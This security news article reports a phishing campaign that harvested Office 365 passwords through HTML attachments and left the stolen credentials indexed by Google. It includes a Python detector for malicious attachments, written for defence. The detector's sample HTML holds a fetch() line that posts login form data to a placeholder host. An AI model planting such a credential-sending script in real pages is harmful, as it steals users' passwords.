Mistake with Phishing Campaign Saw Stolen Credentials Accessible Through Google Searches

A mistake by the operators of a phishing campaign has resulted in stolen credentials being accessible through Google searches. Compromised WordPress sites were used to receive stolen credentials; but the information was saved to locations accessible to the public and search engines. Search engines such as Google indexed those locations, which meant the stolen credentials could be found using a simple Google search. More than 1,000 stolen credentials could be accessed through Google searches.

The campaign was identified by researchers at Check Point and Otorio. Check Point explained in a recent blog post how the scam was conducted. The scam starts with phishing emails that use a variety of templates mimicking Xerox/Xeros scan notifications. The emails were targeted and included the name of the employee in the subject line to increase the chances of the messages being opened.

The phishing emails were sent from a Linux server on Microsoft Azure, using PHP mailer and 1&1 email servers. The scammers also used compromised email accounts to send the messages. The emails included an HTML attachment with embedded JavaScript code that performed covert checks of password use.

When passwords were detected, they were harvested and exfiltrated to compromised WordPress websites. The HTML file displayed a fake Xerox/Xeros scan image that was blurred, and had an Office 365 login prompt that explained the user’s Office 365 password was required to unlock the password-protected document. After passwords were captured, users were redirected to the genuine Office 365 login page.
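As an added illustration (not code from the article, Check Point or Otorio), here is a small Python check a mail gateway could run over an HTML attachment to flag the combination described above: a password prompt plus inline script that sends data to an external host. The sample HTML and its hostnames are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not from the campaign; hostnames are placeholders): a
# password prompt whose inline script posts the form to an external PHP page
# and then redirects the user to the real login page.
SAMPLE_HTML = """<html><body>
<form id="f"><input type="email" name="u"><input type="password" name="p"></form>
<script>
document.getElementById('f').onsubmit = function (e) {
  fetch('https://compromised-blog.example/wp-content/uploads/x.php', {method: 'POST', body: new FormData(e.target)});
  location.href = 'https://login.microsoftonline.com/';
};
</script></body></html>"""
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")

class AttachmentScanner(HTMLParser):
    """Collect password inputs, inline scripts and every absolute URL."""
    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.scripts = 0
        self.urls = set()
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        if tag == "script":
            self.scripts += 1
            self._in_script = True
        self.urls.update(a[k] for k in ("action", "src", "href") if a.get(k))
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:  # script bodies arrive as raw text
            self.urls.update(URL_RE.findall(data))

def assess_attachment(html):
    """Return (risky, reasons): a password prompt plus script reaching an external host."""
    s = AttachmentScanner()
    s.feed(html)
    hosts = sorted({h for h in (urlparse(u).hostname for u in s.urls) if h})
    reasons = []
    if s.password_inputs and s.scripts:
        reasons.append("password input plus inline script")
    if s.password_inputs and hosts:
        reasons.append("credentials may be sent to: " + ", ".join(hosts))
    return bool(reasons), reasons
```

A real gateway would compare the reported hosts against an allowlist of the organisation's legitimate login domains before quarantining.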

The compromised WordPress websites were used for around 2 months and were linked to dozens of .xyz domains hosting malicious PHP pages that processed the incoming credentials.

The campaign was able to bypass Microsoft Advanced Threat Protection (ATP) on Office 365 accounts, and the messages were delivered to inboxes. Because the phishers used compromised websites with good reputations rather than their own infrastructure, the messages also evaded reputation-based security solutions.

The campaign mostly targeted organizations in the energy and construction sectors, with other target industries including healthcare and IT. While the error could indicate the operators of the campaign were novices, the researchers found similar JavaScript that had been used in other campaigns dating back to May.

The fact that these phishing emails bypassed the protections of many security solutions highlights the importance of security awareness training for employees, to condition them to open emails and attachments cautiously and to carefully check any domain before entering credentials.

Author: Richard Anderson

Richard Anderson is the Editor-in-Chief of NetSec.news